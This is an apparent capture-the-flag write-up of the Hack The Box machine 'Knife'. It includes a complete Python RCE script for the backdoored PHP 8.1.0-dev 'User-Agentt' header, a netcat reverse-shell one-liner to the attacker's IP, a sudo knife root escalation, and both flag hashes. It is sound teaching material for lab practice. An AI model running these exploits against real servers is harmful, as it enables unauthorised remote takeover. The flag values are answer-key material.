> For the complete documentation index, see [llms.txt](https://vinetsuicide.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://vinetsuicide.gitbook.io/writeups/linux/easy-boxes/knife.md).

# Knife

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2FhU3tmaZladqMnJsQ0ghb%2FKnife.png?alt=media&amp;token=11488675-4f11-4d49-b3ea-8223d6dbd791" alt="" width="563"><figcaption></figcaption></figure>

## <mark style="color:blue;">Recon</mark>

```bash
ping -c 1 10.10.10.242
PING 10.10.10.242 (10.10.10.242) 56(84) bytes of data.
64 bytes from 10.10.10.242: icmp_seq=1 ttl=63 time=227 ms

--- 10.10.10.242 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 226.707/226.707/226.707/0.000 ms
```

Host is alive, lets scan it.

```sql
sudo nmap 10.10.10.242 -sC -sV -oN knife
```

```sql
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title:  Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## HTTP

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2FeZmCl7vUqaPOibBzEJ5L%2FPasted%20image%2020240302200253.png?alt=media&amp;token=0a94d30b-8ce9-48ef-a024-ff5c6a19200c" alt=""><figcaption></figcaption></figure>

Just static html page, nothing there.

Lets fuzz it.

```sql
ffuf -u http://10.10.10.242/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt                                                                                                                 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.242/FUZZ
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

server-status           [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 97ms]
                        [Status: 200, Size: 5815, Words: 646, Lines: 221, Duration: 101ms]
                        [Status: 200, Size: 5815, Words: 646, Lines: 221, Duration: 92ms]
                        [Status: 200, Size: 5815, Words: 646, Lines: 221, Duration: 83ms]
:: Progress: [62284/62284] :: Job [1/1] :: 364 req/sec :: Duration: [0:02:36] :: Errors: 2 ::
```

And nothing. Seems interesting.

## <mark style="color:red;">james shell</mark>

I will check response headers.

```bash
curl -I http://10.10.10.242/                                                                        
HTTP/1.1 200 OK
Date: Sat, 02 Mar 2024 16:58:49 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Content-Type: text/html; charset=UTF-8
```

Hmm, this <mark style="color:red;">**"PHP/8.1.0-dev"**</mark> looks interesting.

I will google it, and looks like this version is vulnerable to RCE.

And it is very easy exploitable...

We just need to specify one more header named "User-Agentt" and type in there zerodiumsystem and a command.

There are couple of blogs about it. You can just Google it

But I created a&#x20;

```python
#!/usr/bin/env python3
import os
import re
import requests
import argparse

# Function to print output in red color
def print_error(msg):
    print("\033[1;31m{}\033[0m".format(msg))

# Function to print output in green color
def print_success(msg):
    print("\033[1;32m{}\033[0m".format(msg))

# Function to print output in yellow color
def print_warning(msg):
    print("\033[1;33m{}\033[0m".format(msg))

# Function to print output in blue color
def print_info(msg):
    print("\033[1;34m{}\033[0m".format(msg))

def main(host):
    request = requests.Session()
    response = request.get(host)

    # Check if the response status is 200
    if response.status_code == 200:
        print_success("\nNow you can type commands :) {}\n".format(host))
        try:
            while True:
                cmd = input("$ ")
                headers = {
                    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
                    "User-Agentt": "zerodiumsystem('" + cmd + "');"
                }
                response = request.get(host, headers=headers, allow_redirects=False)
                current_page = response.text
                stdout = current_page.split('<!DOCTYPE html>', 1)
                # Print only the text before <!DOCTYPE html>
                print_info(stdout[0])
        except KeyboardInterrupt:
            print("Exiting...")
            exit()

    else:
        print("\r")
        print_error("ERROR:host is not available.")
        exit()

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="Host URL")
    args = parser.parse_args()
    
    if args.url:
        main(args.url)
    else:
        print_error("Error: Please specify the host URL using -u or --url option.")

```

```bash
python3 rce-php8.py -u http://10.10.10.242/
```

```bash
$ whoami   
james
```

And we are <mark style="color:red;">**"james"**</mark> user.

This is not fully interactive shell, so Im going to send a reverse shell via netcat.

```bash
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.5 4224 >/tmp/f
```

```sql
nc -lnvp 4224
listening on [any] 4224 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.242] 53098
/bin/sh: 0: can't access tty; job control turned off
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
james@knife:/$ ^Z
zsh: suspended  nc -lnvp 4224
                                                                                                                                                                                                                                              
musor@kali:~/wu/Knife$ stty raw -echo | fg                       
[1]  + continued  nc -lnvp 4224


james@knife:/$ export TERM=xterm
export TERM=xterm
```

got it, and upgraded.

Also got a first.flag

```bash
cat user.txt
e85800f2557e33237ff2f7dc6eb8b392
```

## <mark style="color:red;">root shell</mark>

```bash
sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
```

We can execute "knife" binary as root, lets check [GTFObins](https://gtfobins.github.io/) for priv-esc.

```sql
sudo knife exec -E 'exec "/bin/sh"'
# id
id
uid=0(root) gid=0(root) groups=0(root)
```

And it was very easy priv-esc :fire:

```sql
cat root.txt
89b56e3975ce23ccc514af06ec86db38
```

root.flag
